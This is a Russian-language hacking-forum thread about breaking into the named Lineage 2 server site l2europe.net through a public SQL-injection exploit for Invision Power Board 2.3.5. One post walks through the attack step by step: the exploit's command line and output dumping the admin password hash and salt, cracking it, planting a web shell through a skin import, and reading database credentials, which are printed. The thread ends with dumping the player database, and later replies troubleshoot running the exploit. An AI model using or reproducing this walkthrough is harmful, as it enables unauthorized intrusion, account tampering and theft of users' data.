[Уязвимость] Рабочая уязвимость на l2europe.net (сервер из топ15)

[ATJIaHTuK]

Взлом паблик багой одного из сервера в топ15 л2топа.
Работает на данный момент.
Базу заливать не буду - сделаете как на видео - сами сольете
Сайт - STRESSWEB 9, форум IPB.
Онлайн ~1k
В итоге получаем полный доступ к базе сервера(рисуете шмот, ГМправа,да что хотите и сливаете бд ).
В архиве сам видеофайл .avi ~15минут и txt файл из видео.
Размер архива ~115mb

[Ссылки могут видеть только зарегистрированные пользователи. ]
Взято с АЧ)
Нет возможности проверить, слишком большой размер.

[Dimulya]

Цитата: Сообщение от mucerato Выложите плз текстовый документ. Инет обрушился, через gprs сижу =)

[Ссылки могут видеть только зарегистрированные пользователи. ]

[PornFlakex]

l2europe.net вот этот сервер всё отличто работает

[Crawd]

с базой только одна проблема добрая половина акков была создана брутерами которые забыли про авторегу в первые часы сервака

[HellFire]

Цитата: Простенькое видео о взломе lineage сервера через паблик уязвимость Нам нужен сплоит для ipb 2.3.5 такой есть в паблике. У меня он уже скачан, так что не важно Я только что проделывал это, но для видео сделаю все еще раз. Z:\usr\local\php5>php.exe 2.3.5-ipb-multi.php -attack 3 -url [Ссылки могут видеть только зарегистрированные пользователи. ] -uid 639 //строка запуска сплоита Invision Power Board <= 2.3.5 Multiple Vulnerabilities ------------------------------------------------------ Update by Elekt version 1.5 ::[TURBO]:: Attack(s): + [20.03.2010 03:35:29] + [Ссылки могут видеть только зарегистрированные пользователи. ] / IDS bypass: 1 / Cheking sql-injection.. + Forum vulnerable! / Using default table prefix: ibf_ + Prefix ibf_ is correct + Using targeted user id 639 / Trying to get the password hash + pass_hash=f2a22f4ef46399fee58d5887b5623b88 - хэш пароля админа + Ok, using hash f2a22f4ef46399fee58d5887b5623b88 / Trying to get the password salt + pass_salt=-Y,9? - соль + Ok, using salt -Y,9? + Enjoy! + [20.03.2010 03:35:41] + Total: 187 f2a22f4ef46399fee58d5887b5623b88:-Y,9? теперь нам надо сбрутить это и получить пароль я буду использовать EGB от insidepro, можно использовать и passwordsPRO Настройки программы. Будем брутить только маленькие символы=) Авось повезет ; Standard character sets: ; ?d: 0123456789 ; ?l: abcdefghijklmnopqrstuvwxyz ; ?u: ABCDEFGHIJKLMNOPQRSTUVWXYZ ; ?s: !@#$%^&*()`~-_=+\|[]{};:'",.<>/? CharacterSet=?l Все, пароль нашелся. Он был простой... C:\music NEW\egb(2)\Новая папка>"md5(md5($salt).md5($pass)).exe" conf.ini conf.txt f2a22f4ef46399fee58d5887b5623b88:ybrbnf All passwords found! C:\music NEW\egb(2)\Новая папка> Теперь заходим админом на форум. Теперь нужно залить шелл в админку [Ссылки могут видеть только зарегистрированные пользователи. ] - тут описано как сделать это качаем [Ссылки могут видеть только зарегистрированные пользователи. ] =) теперь заливаем в админку. Сделали по инструкции и залили шелл Сообщение от c0m В общем все просто находим доступ в админку, заходим Далее - Внешний Вид тут: Если скин IP.Board Pro то делаем так: 1. заходим в настройки этого скина смотрим в какой директории лежат изображения для этого скина. Запоминаем. 2. Импорт и экспорт стилей - Импорт... - Импорт изображений выбираем ipb_images-ip.boardpr.xml.gz (Какой стиль использовать с импортируемой директорией? IP.Board Pro) - Импортируем узнаем где лежит шелл, заходим в настройки скина IP.Board Pro Директория с изображениями - ip.boardpr1228455805 (в моем случае) Изменяем так как было изночально. Шелл будет доступен в директории [Ссылки могут видеть только зарегистрированные пользователи. ] [Ссылки могут видеть только зарегистрированные пользователи. ] - Этот скин для версии 2.2.х и выше, на 2.1.х не пробывал вот и наш шелл) теперь надо найти пароль от бд и слить её. Данные от БД define("DBHOST","localhost"); define("DBUSER","l2biz_l2"); define("DBPASS","1q2w3e"); define("DBNAME","l2biz_l2"); define("COLLATE","utf8"); Я для удобства залью другой шелл, ибо МНЕ тяжело работать с этим, не привык WSO2 так гораздо удобнее=) Подключаемся к БД Нашли информацию о базах L2 сервера) Все мы в бд ла2, да кстати движок на сайте стоит STRESSWEB 9. Все, сливаем базу и выкладываем на allcheats.ru теперь стираем шеллы и идем спать. Всем спасибо.

описание видео.

[object]

Не кто не даст ту программку?)
Сплоит Ип борда

[fuzzion]

_http://packetstormsecurity.org/0808-exploits/ipb235-multi.txt

[Underwhy]

Да вы что...
Сплоит работает на 1% всех форумов IPB
Работает он ТОЛЬКО на 2.3.5

Invision Power Board <= 2.3.5 Multiple Vulnerabilities
------------------------------------------------------
Update by Elekt version 1.5 ::[TURBO]::

Attack(s):

+ [04.04.2010 18:01:09]
+ [Ссылки могут видеть только зарегистрированные пользователи. ]
/ IDS bypass: 1
/ Cheking sql-injection..
- Forum unvulnerable
/ Try [Ссылки могут видеть только зарегистрированные пользователи. ]
&name=%2527
+ [04.04.2010 18:01:10]
+ Total: 1

[Underwhy]

Invision Power Board <= 2.3.5 Multiple Vulnerabilities
------------------------------------------------------
Update by Elekt version 1.5 ::[TURBO]::

Attack(s):

+ [04.04.2010 18:01:09]
+ [Ссылки могут видеть только зарегистрированные пользователи. ]
/ IDS bypass: 1
/ Cheking sql-injection..
- Forum unvulnerable
/ Try [Ссылки могут видеть только зарегистрированные пользователи. ]
&name=%2527
+ [04.04.2010 18:01:10]
+ Total: 1

[Ingi]

[Ссылки могут видеть только зарегистрированные пользователи. ]

[Bomjke]

[Ссылки могут видеть только зарегистрированные пользователи. ]
ХЕЛП

[Bomjke]

Всё получилась теперь новая проблема вписал адрес нажимаю ентер открываетса новая командная строка с каким то текстом и сразу закрываетса, а в 1 ни чего не пишет ...

[CeDou]

Цитата: Сообщение от Nickitee D:\ololo>php.exe 2.3.5-ipb-multi.php "php.exe" не является внутренней или внешней командой, исполняемой программой или пакетным файлом Ололо, хелп xD

до этой строки

Цитата: php.exe 2.3.5-ipb-multi.php

должен быть путь где находится php интерпритатор.

В большинстве случаев, если это денвер и ставилось по дефолту. путь будет как у автора

И файл 2.3.5-ipb-multi.php должен быть в папке с интерпритатором

[fuzzion]

у меня другая проблема - ввожу тип атаки урл етц. и мне опять показывают искходный код скрипта, как если бы я просто прописал его запуск x_x

[Bomjke]

[Ссылки могут видеть только зарегистрированные пользователи. ] [Ссылки могут видеть только зарегистрированные пользователи. ]
Форум IP.Board 2.3.5
Пробуйте мб у меня трабл ...